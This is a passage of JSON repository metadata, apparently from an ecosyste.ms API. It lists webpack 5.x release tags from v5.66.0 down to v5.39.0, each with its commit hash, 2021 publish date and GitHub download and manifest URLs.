ebpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https: